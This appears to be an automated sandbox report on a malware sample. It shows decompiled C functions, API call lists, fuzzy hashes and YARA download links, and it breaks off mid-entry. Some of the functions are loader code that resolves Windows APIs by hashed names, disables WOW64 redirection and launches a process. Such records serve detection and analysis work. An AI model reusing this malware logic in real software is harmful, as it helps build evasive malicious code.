Instruction ID: d5209189ba2bc8835120eaa5f7320a9d7e0a5a8bfabf2ac6ff86f12cbd4e2f00
Opcode Fuzzy Hash: 0308661200250213b2e85d71fe956e8d2386b3b2fab5cbeb1c8077eb388aa69b
Instruction Fuzzy Hash: 4A71AE71103215AFD739DF69FC88E467BEDEF88304B150524F969C3254EB3AA848CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 011D2022, Relevance: 16.6, APIs: 11, Instructions: 149
timememoryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E011D2022(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t61;
				long _t65;
				signed int _t66;
				void* _t71;
				signed int _t72;
				intOrPtr _t74;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t74 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x11da298);
					_v20 = 0;
					_v16 = 0;
					L011D7D8C();
					_v36.LowPart = _t46;
					_v32 = _t74;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0x11da2c4; // 0x238
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0 || E011D1AB8(_t74) != 0) {
							 *0x11da2a4 = 5;
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0x11da2b8 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t72 = _v12;
						_t58 = _t72 << 4;
						_t76 = _t80 + (_t72 << 4) - 0x54;
						_t73 = _t72 + 1;
						_v24 = _t72 + 1;
						_t61 = E011D5F9A( &_v20, _t73, _t76, _t73, _t80 + _t58 - 0x58, _t76,  &_v16);
						_v8.LowPart = _t61;
						if(_t61 != 0) {
							goto L17;
						}
						_t66 = _v24;
						_t90 = _t66 - 3;
						_v12 = _t66;
						if(_t66 != 3) {
							goto L6;
						} else {
							_v8.LowPart = E011D3032(_t73, _t90,  &_v92, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t61 - 0x10d2;
						if(_t61 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x11da29c);
							goto L21;
						} else {
							__eflags =  *0x11da2a0; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t61 = E011D1492();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x11da2a0);
								L21:
								L011D7D8C();
								_v36.LowPart = _t61;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
								_t65 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								__eflags = _t65;
								_v8.LowPart = _t65;
								if(_t65 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t71 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							HeapFree( *0x11da290, 0, _t54);
						}
						_t78 =  &(_t78[4]);
						_t71 = _t71 - 1;
					} while (_t71 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}

0x011d2022
0x011d2034
0x011d2037
0x011d2043
0x011d204b
0x011d204e
0x011d21b4
0x011d2054
0x011d2054
0x011d2056
0x011d205b
0x011d205c
0x011d2062
0x011d2065
0x011d2068
0x011d2076
0x011d2081
0x011d2084
0x011d2086
0x011d2093
0x011d209d
0x011d20a1
0x011d20a4
0x011d20a9
0x011d20b4
0x011d20b4
0x011d20be
0x00000000
0x011d20c1
0x011d20c5
0x011d20d0
0x011d20d0
0x011d20d7
0x011d20dc
0x011d20e3
0x011d20ec
0x011d20f2
0x011d20f5
0x011d20fc
0x011d20ff
0x00000000
0x00000000
0x011d2101
0x011d2104
0x011d2107
0x011d210a
0x00000000
0x011d210c
0x011d211b
0x011d211b
0x00000000
0x011d2149
0x011d2149
0x011d214e
0x011d216d
0x011d216f
0x011d2174
0x011d2175
0x00000000
0x011d2150
0x011d2150
0x011d2156
0x00000000
0x011d2158
0x011d2158
0x011d215d
0x011d215f
0x011d2164
0x011d2165
0x011d217b
0x011d217b
0x011d2183
0x011d218e
0x011d2191
0x011d219c
0x011d219e
0x011d21a0
0x011d21a3
0x00000000
0x011d21a9
0x00000000
0x011d21a9
0x011d21a3
0x011d2156
0x00000000
0x011d214e
0x011d211e
0x011d2120
0x011d2123
0x011d2124
0x011d2124
0x011d2128
0x011d2132
0x011d2132
0x011d2138
0x011d213b
0x011d213b
0x011d2141
0x011d2141
0x011d21be
0x00000000

APIs

memset.NTDLL ref: 011D2037
CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 011D2043
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 011D2068
SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 011D2084
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 011D209D
HeapFree.KERNEL32(00000000,00000000), ref: 011D2132
CloseHandle.KERNEL32(?), ref: 011D2141
_allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 011D217B
SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,011D560C), ref: 011D2191
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 011D219C

Part of subcall function 011D1AB8: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,281EC7EF,011DBD98,?,00000000,F8C925DB,00000014,2738C7B8,011DBD54), ref: 011D1BA4
Part of subcall function 011D1AB8: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,011D20B0), ref: 011D1BB6

GetLastError.KERNEL32 ref: 011D21AE

Memory Dump Source

Source File: 00000000.00000002.479684101.00000000011D1000.00000020.00000001.sdmp, Offset: 011D0000, based on PE: true

Associated: 00000000.00000002.479673787.00000000011D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479715506.00000000011D9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.479745898.00000000011DA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479794058.00000000011DC000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
String ID:
API String ID: 3521023985-0
Opcode ID: fde2a4f91a0085ad88d24e7d073107070c33960c8a5d224def213ac922272bc9
Instruction ID: 75aaeda4a49e7d83c4bd6079706dc82c353b05df06287ef19a805b49d5f1152f
Opcode Fuzzy Hash: fde2a4f91a0085ad88d24e7d073107070c33960c8a5d224def213ac922272bc9
Instruction Fuzzy Hash: DE515E75802229AEDF29DFA9DC44DEEBFBDEF05364F204126E524E2184D7758680CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 011D5927, Relevance: 13.6, APIs: 9, Instructions: 112
stringCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E011D5927(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				intOrPtr _v20;
				signed int _v24;
				void* __esi;
				long _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				intOrPtr* _t80;
				intOrPtr _t91;

				_t79 =  *0x11da38c; // 0x0
				_v24 = 8;
				_t43 = GetTickCount();
				_push(5);
				_t74 = 0xa;
				_v16 = _t43;
				_t44 = E011D4E1B(_t74,  &_v16);
				_v8 = _t44;
				if(_t44 == 0) {
					_v8 = 0x11d91ac;
				}
				_t46 = E011D42F0(_t79);
				_v12 = _t46;
				if(_t46 != 0) {
					_t80 = __imp__;
					_t48 =  *_t80(_v8, _t71);
					_t49 =  *_t80(_v12);
					_t50 =  *_t80(_a4);
					_t54 = E011D6837(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
					_v20 = _t54;
					if(_t54 != 0) {
						_t75 =  *0x11da2d4; // 0x0
						_t16 = _t75 + 0x11dbaa8; // 0x70318002
						 *0x11da138(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
						_push(4);
						_t77 = 5;
						_t57 = E011D4E1B(_t77,  &_v16);
						_v8 = _t57;
						if(_t57 == 0) {
							_v8 = 0x11d91b0;
						}
						_t58 =  *_t80(_v8);
						_t59 =  *_t80(_v12);
						_t60 =  *_t80(_a4);
						_t91 = E011D6837(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
						if(_t91 == 0) {
							E011D50CA(_v20);
						} else {
							_t66 =  *0x11da2d4; // 0x0
							_t31 = _t66 + 0x11dbbc8; // 0xb9d63b8e
							 *0x11da138(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
							 *_a16 = _v20;
							_v24 = _v24 & 0x00000000;
							 *_a20 = _t91;
						}
					}
					E011D50CA(_v12);
				}
				return _v24;
			}

0x011d592f
0x011d5935
0x011d593c
0x011d5942
0x011d5946
0x011d594a
0x011d594d
0x011d5954
0x011d5957
0x011d5959
0x011d5959
0x011d5962
0x011d5969
0x011d596c
0x011d5972
0x011d597c
0x011d5985
0x011d598c
0x011d59a5
0x011d59ac
0x011d59af
0x011d59b8
0x011d59c1
0x011d59d2
0x011d59db
0x011d59df
0x011d59e3
0x011d59ea
0x011d59ed
0x011d59ef
0x011d59ef
0x011d59f9
0x011d5a02
0x011d5a09
0x011d5a21
0x011d5a25
0x011d5a62
0x011d5a27
0x011d5a2a
0x011d5a32
0x011d5a43
0x011d5a4f
0x011d5a57
0x011d5a5b
0x011d5a5b
0x011d5a25
0x011d5a6a
0x011d5a6f
0x011d5a76

APIs

GetTickCount.KERNEL32 ref: 011D593C
lstrlen.KERNEL32(?,80000002,00000005), ref: 011D597C
lstrlen.KERNEL32(00000000), ref: 011D5985
lstrlen.KERNEL32(00000000), ref: 011D598C
lstrlenW.KERNEL32(80000002), ref: 011D5999
lstrlen.KERNEL32(?,00000004), ref: 011D59F9
lstrlen.KERNEL32(?), ref: 011D5A02
lstrlen.KERNEL32(?), ref: 011D5A09
lstrlenW.KERNEL32(?), ref: 011D5A10

Part of subcall function 011D50CA: HeapFree.KERNEL32(00000000,00000000,011D4239,00000000,00000001,?,00000000,?,?,?,011D6B8D,00000000,?,00000001), ref: 011D50D6

Memory Dump Source

Source File: 00000000.00000002.479684101.00000000011D1000.00000020.00000001.sdmp, Offset: 011D0000, based on PE: true

Associated: 00000000.00000002.479673787.00000000011D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479715506.00000000011D9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.479745898.00000000011DA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479794058.00000000011DC000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlen$CountFreeHeapTick
String ID:
API String ID: 2535036572-0
Opcode ID: 23cd812ee6111f096f67b2ce46f0013a218d8ef8cd49a64af1bec5c7301f2f8a
Instruction ID: e13d37f90dae0ab08e8583e509f5c816db4bcfc8b3ed7f866e1a00d5c4276151
Opcode Fuzzy Hash: 23cd812ee6111f096f67b2ce46f0013a218d8ef8cd49a64af1bec5c7301f2f8a
Instruction Fuzzy Hash: 2D416A72C01219FFCF29EFA4DD48A9E7BB5EF48318F050060EE04A7221D7359A50EB90

Uniqueness

Uniqueness Score: -1.00%

Function 011D51A8, Relevance: 13.6, APIs: 9, Instructions: 110
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E011D51A8(void* __eax, void* __ecx) {
				long _v8;
				void* _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t39;
				intOrPtr _t43;
				intOrPtr _t50;
				void* _t52;
				intOrPtr _t53;
				void* _t61;
				intOrPtr* _t66;
				intOrPtr* _t73;
				intOrPtr* _t76;

				_t1 = __eax + 0x14; // 0x74183966
				_t71 =  *_t1;
				_t39 = E011D4F5A(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t39;
				if(_t39 != 0) {
					L12:
					return _v8;
				}
				E011D77A4( *((intOrPtr*)(_t71 + 0xc)),  *((intOrPtr*)(_t71 + 8)), _v12);
				_t43 = _v12(_v12);
				_v8 = _t43;
				if(_t43 == 0 && ( *0x11da2b8 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t50 =  *0x11da2d4; // 0x0
					_t18 = _t50 + 0x11db4a3; // 0x229b40a
					_t52 = E011D6343(_t18);
					_v12 = _t52;
					if(_t52 == 0) {
						_v8 = 8;
					} else {
						_t53 =  *0x11da2d4; // 0x0
						_t20 = _t53 + 0x11db770; // 0x11db770
						_t21 = _t53 + 0x11db0af; // 0xee60505d
						_t66 = GetProcAddress(GetModuleHandleA(_t21), _t20);
						if(_t66 == 0) {
							_v8 = 0x7f;
						} else {
							_t73 = __imp__;
							_v108 = 0x44;
							 *_t73(0);
							_t61 =  *_t66(0, _v12, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32);
							 *_t73(1);
							if(_t61 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x11da290, 0, _v12);
					}
				}
				_t76 = _v16;
				 *((intOrPtr*)(_t76 + 0x18))( *((intOrPtr*)(_t76 + 0x1c))( *_t76));
				E011D50CA(_t76);
				goto L12;
			}

0x011d51b1
0x011d51b1
0x011d51bf
0x011d51c8
0x011d51cb
0x011d52dd
0x011d52e4
0x011d52e4
0x011d51da
0x011d51e2
0x011d51e7
0x011d51ea
0x011d51ff
0x011d5205
0x011d5206
0x011d5209
0x011d520f
0x011d5212
0x011d5217
0x011d521f
0x011d5226
0x011d522d
0x011d5230
0x011d52c4
0x011d5236
0x011d5236
0x011d523b
0x011d5242
0x011d5256
0x011d525a
0x011d52ab
0x011d525c
0x011d525c
0x011d5263
0x011d526a
0x011d5282
0x011d5288
0x011d528c
0x011d52a6
0x011d528e
0x011d5297
0x011d529c
0x011d529c
0x011d528c
0x011d52bc
0x011d52bc
0x011d5230
0x011d52cb
0x011d52d4
0x011d52d8
0x00000000

APIs

Part of subcall function 011D4F5A: GetModuleHandleA.KERNEL32(E66068DB,00000020,74183966,00000000,00000000,?,?,?,011D51C4,?,?,?,?,00000000,00000000), ref: 011D4F7F
Part of subcall function 011D4F5A: GetProcAddress.KERNEL32(00000000,A8E5FD73), ref: 011D4FA1
Part of subcall function 011D4F5A: GetProcAddress.KERNEL32(00000000,94BA1371), ref: 011D4FB7
Part of subcall function 011D4F5A: GetProcAddress.KERNEL32(00000000,A3348E43), ref: 011D4FCD
Part of subcall function 011D4F5A: GetProcAddress.KERNEL32(00000000,45DAC78A), ref: 011D4FE3
Part of subcall function 011D4F5A: GetProcAddress.KERNEL32(00000000,23A90951), ref: 011D4FF9

memset.NTDLL ref: 011D5212

Part of subcall function 011D6343: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,011D522B,0229B40A), ref: 011D6354
Part of subcall function 011D6343: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 011D636E

GetModuleHandleA.KERNEL32(EE60505D,011DB770,0229B40A), ref: 011D5249
GetProcAddress.KERNEL32(00000000), ref: 011D5250
Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 011D526A
Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 011D5288
CloseHandle.KERNEL32(00000000), ref: 011D5297
CloseHandle.KERNEL32(?), ref: 011D529C
GetLastError.KERNEL32 ref: 011D52A0
HeapFree.KERNEL32(00000000,?), ref: 011D52BC

Memory Dump Source

Source File: 00000000.00000002.479684101.00000000011D1000.00000020.00000001.sdmp, Offset: 011D0000, based on PE: true

Associated: 00000000.00000002.479673787.00000000011D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479715506.00000000011D9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.479745898.00000000011DA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479794058.00000000011DC000.00000002.00000001.sdmp Download File

Similarity

API ID: AddressProc$HandleWow64$CloseEnableEnvironmentExpandModuleRedirectionStrings$ErrorFreeHeapLastmemset
String ID:
API String ID: 91923200-0
Opcode ID: b136ea6089eade33f92937e48cda8f7a348fda79fea67487349dc53a2802a062
Instruction ID: d3d8d6322786b2ac8fd51ee1a262f0797d94ded82b05b876308413162e9bf2e3
Opcode Fuzzy Hash: b136ea6089eade33f92937e48cda8f7a348fda79fea67487349dc53a2802a062
Instruction Fuzzy Hash: E1316A71902219EFDB29AFE8DC4899EBFB9FF08304F104061E215A3154D731AA85CB90

Uniqueness

Uniqueness Score: -1.00%

Function 011D6384, Relevance: 13.6, APIs: 9, Instructions: 72
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E011D6384(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L011D7D86();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x11da2d4; // 0x0
				_t5 = _t13 + 0x11db8a2; // 0x11db8a2
				_t6 = _t13 + 0x11db57c; // 0x275ca0c8
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L011D7A6A();
				_t30 = CreateFileMappingW(0xffffffff, 0x11da2f8, 4, 0, 0x1000,  &_v56);
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0);
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}

0x011d6384
0x011d638c
0x011d6390
0x011d6396
0x011d639b
0x011d63a0
0x011d63a3
0x011d63a6
0x011d63ab
0x011d63ac
0x011d63af
0x011d63b4
0x011d63bb
0x011d63c5
0x011d63c7
0x011d63c8
0x011d63cb
0x011d63ed
0x011d63f1
0x011d643f
0x011d63f3
0x011d6400
0x011d6410
0x011d6418
0x011d642a
0x011d642e
0x00000000
0x00000000
0x011d641a
0x011d641d
0x011d6422
0x011d6424
0x011d6424
0x011d6402
0x011d6404
0x011d6430
0x011d6431
0x011d6431
0x011d6400
0x011d6446

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,011D5488,?,00000001,8B330082,00000001,011DA2FC,00000000,?), ref: 011D6390
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 011D63A6
_snwprintf.NTDLL ref: 011D63CB
CreateFileMappingW.KERNEL32(000000FF,011DA2F8,00000004,00000000,00001000,?), ref: 011D63E7
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,011D5488,?,00000001,8B330082,00000001,011DA2FC), ref: 011D63F9
MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,011D5488), ref: 011D6410
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,011D5488,?,00000001,8B330082,00000001), ref: 011D6431
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,011D5488,?,00000001,8B330082,00000001,011DA2FC), ref: 011D6439

Memory Dump Source

Source File: 00000000.00000002.479684101.00000000011D1000.00000020.00000001.sdmp, Offset: 011D0000, based on PE: true

Associated: 00000000.00000002.479673787.00000000011D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479715506.00000000011D9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.479745898.00000000011DA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479794058.00000000011DC000.00000002.00000001.sdmp Download File

Similarity

API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1814172918-0
Opcode ID: 98b017204ab7cd4fdd1bfa3907c60aef08825bc638d65e423981bcd852a52e82
Instruction ID: da5294d825b411f355d4007c53fe5a72fda61d75623829f885519a9c23ad64b1
Opcode Fuzzy Hash: 98b017204ab7cd4fdd1bfa3907c60aef08825bc638d65e423981bcd852a52e82
Instruction Fuzzy Hash: A1210572642218FBDB28AF68EC05F9E7BB9AF44754F214121FA15E71C0DB709540CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0111EE50, Relevance: 9.2, APIs: 6, Instructions: 240COMMON

Download Yara Rule

APIs

getSystemCP.LIBCMTD ref: 0111EE65

Part of subcall function 0111ED40: GetOEMCP.KERNEL32(00000000,011531E0,01133658,000000FF,?,0111EB06,?), ref: 0111ED99
Part of subcall function 0111ED40: _LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 0111EDAC

setSBCS.LIBCMTD ref: 0111EE7A
setSBUpLow.LIBCMTD ref: 0111EFD6

Memory Dump Source

Source File: 00000000.00000002.479054596.00000000010EE000.00000020.00020000.sdmp, Offset: 010EE000, based on PE: false

Similarity

API ID: Locale$SystemUpdateUpdate::~_
String ID:
API String ID: 2101441384-0
Opcode ID: dd540b47d505d0a0a0ace3aca180c8cd4562cfea4ca4d4fb00a03e88e47427bb
Instruction ID: 3dcee9ef50f4c3a76f954d5551eab0db4286dc3a3ef244b652e0674e759ace35
Opcode Fuzzy Hash: dd540b47d505d0a0a0ace3aca180c8cd4562cfea4ca4d4fb00a03e88e47427bb
Instruction Fuzzy Hash: FFB1387490511ADFDB08CF98C890AADFBB1BF45304F18C56AEC265B349D331EA49CB92

Uniqueness

Uniqueness Score: -1.00%

Function 011D2902, Relevance: 9.1, APIs: 6, Instructions: 120memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 011D295E
SysAllocString.OLEAUT32(53327E6E), ref: 011D2972
SysAllocString.OLEAUT32(00000000), ref: 011D2984
SysFreeString.OLEAUT32(00000000), ref: 011D29E8
SysFreeString.OLEAUT32(00000000), ref: 011D29F7
SysFreeString.OLEAUT32(00000000), ref: 011D2A02

Memory Dump Source

Source File: 00000000.00000002.479684101.00000000011D1000.00000020.00000001.sdmp, Offset: 011D0000, based on PE: true

Associated: 00000000.00000002.479673787.00000000011D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479715506.00000000011D9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.479745898.00000000011DA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479794058.00000000011DC000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 7824eaaa401b14954da7368950f27a6415122f01ba069019e6f4a6d5802025c4
Instruction ID: 56ac5d0467c3c0c39474ed0312de4e70e85a5c0c6a9b5561847adcc47635783c
Opcode Fuzzy Hash: 7824eaaa401b14954da7368950f27a6415122f01ba069019e6f4a6d5802025c4
Instruction Fuzzy Hash: 41316D32D00619AFDF15EFBCD848A9FBBBAAF49314F144425EE20EB110EB719905CB91

Uniqueness

Uniqueness Score: -1.00%

Function 011D4F5A, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E011D4F5A(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E011D6837(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x11da2d4; // 0x0
					_t1 = _t23 + 0x11db11a; // 0xe66068db
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x11da2d4; // 0x0
					_t2 = _t26 + 0x11db792; // 0xa8e5fd73
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E011D50CA(_t54);
					} else {
						_t30 =  *0x11da2d4; // 0x0
						_t5 = _t30 + 0x11db77f; // 0x94ba1371
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x11da2d4; // 0x0
							_t7 = _t33 + 0x11db74e; // 0xa3348e43
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x11da2d4; // 0x0
								_t9 = _t36 + 0x11db72e; // 0x45dac78a
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x11da2d4; // 0x0
									_t11 = _t39 + 0x11db7a2; // 0x23a90951
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E011D4248(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x011d4f69
0x011d4f6d
0x011d502f
0x011d4f73
0x011d4f73
0x011d4f78
0x011d4f8b
0x011d4f8d
0x011d4f92
0x011d4f9a
0x011d4fa1
0x011d4fa5
0x011d4fa8
0x011d5027
0x011d5028
0x011d4faa
0x011d4faa
0x011d4faf
0x011d4fb7
0x011d4fbb
0x011d4fbe
0x00000000
0x011d4fc0
0x011d4fc0
0x011d4fc5
0x011d4fcd
0x011d4fd1
0x011d4fd4
0x00000000
0x011d4fd6
0x011d4fd6
0x011d4fdb
0x011d4fe3
0x011d4fe7
0x011d4fea
0x00000000
0x011d4fec
0x011d4fec
0x011d4ff1
0x011d4ff9
0x011d4ffd
0x011d5000
0x00000000
0x011d5002
0x011d5008
0x011d500d
0x011d5014
0x011d501b
0x011d501e
0x00000000
0x011d5020
0x011d5023
0x011d5023
0x011d501e
0x011d5000
0x011d4fea
0x011d4fd4
0x011d4fbe
0x011d4fa8
0x011d503d

APIs

Part of subcall function 011D6837: RtlAllocateHeap.NTDLL(00000000,00000000,011D4197), ref: 011D6843

GetModuleHandleA.KERNEL32(E66068DB,00000020,74183966,00000000,00000000,?,?,?,011D51C4,?,?,?,?,00000000,00000000), ref: 011D4F7F
GetProcAddress.KERNEL32(00000000,A8E5FD73), ref: 011D4FA1
GetProcAddress.KERNEL32(00000000,94BA1371), ref: 011D4FB7
GetProcAddress.KERNEL32(00000000,A3348E43), ref: 011D4FCD
GetProcAddress.KERNEL32(00000000,45DAC78A), ref: 011D4FE3
GetProcAddress.KERNEL32(00000000,23A90951), ref: 011D4FF9

Part of subcall function 011D4248: memset.NTDLL ref: 011D42C7

Memory Dump Source

Source File: 00000000.00000002.479684101.00000000011D1000.00000020.00000001.sdmp, Offset: 011D0000, based on PE: true

Associated: 00000000.00000002.479673787.00000000011D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479715506.00000000011D9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.479745898.00000000011DA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479794058.00000000011DC000.00000002.00000001.sdmp Download File

Similarity

API ID: AddressProc$AllocateHandleHeapModulememset
String ID:
API String ID: 1886625739-0
Opcode ID: 4a3c775aca9789ce055829cf086bc515eb24cb1b8a84d0144cc25e81753cc7f3
Instruction ID: f838750c275f400b4b19dfadab9454569f1a080bd8316d99d88b5ea3433c3a02
Opcode Fuzzy Hash: 4a3c775aca9789ce055829cf086bc515eb24cb1b8a84d0144cc25e81753cc7f3
Instruction Fuzzy Hash: 752171B160134AAFEB68DF6DE884E5B77FCEF08284B064025E519C7291DB35E905CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0112CEB0, Relevance: 9.1, APIs: 6, Instructions: 75COMMON

Download Yara Rule

APIs

___initconout.LIBCMTD ref: 0112CED2

Part of subcall function 01131470: CreateFileA.KERNEL32(01150900,40000000,00000003,00000000,00000003,00000000,00000000,?,0112CED7,?,?,?,01127436,?), ref: 01131487

